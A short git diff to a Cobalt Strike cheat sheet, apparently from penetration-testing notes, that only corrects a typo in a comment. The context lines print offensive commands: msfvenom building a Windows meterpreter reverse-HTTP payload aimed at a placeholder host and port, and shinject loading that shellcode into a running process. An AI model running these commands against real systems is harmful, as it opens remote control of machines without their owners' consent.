diff --git a/c2/cobalt-strike.md b/c2/cobalt-strike.md index b8b67c2e..d0c3e70a 100644 --- a/c2/cobalt-strike.md +++ b/c2/cobalt-strike.md @@ -160,7 +160,7 @@ beacon> spawn metasploit msfvenom -p windows/x64/meterpreter_reverse_http LHOST=<IP> LPORT=<PORT> -f raw -o /tmp/msf.bin ## Run msfvenom and prepare the multi/handler listener -## Copy bin file to coblat strike host +## Copy bin file to cobalt strike host ps shinject <pid> x64 C:\Payloads\msf.bin #Inject metasploit shellcode in a x64 process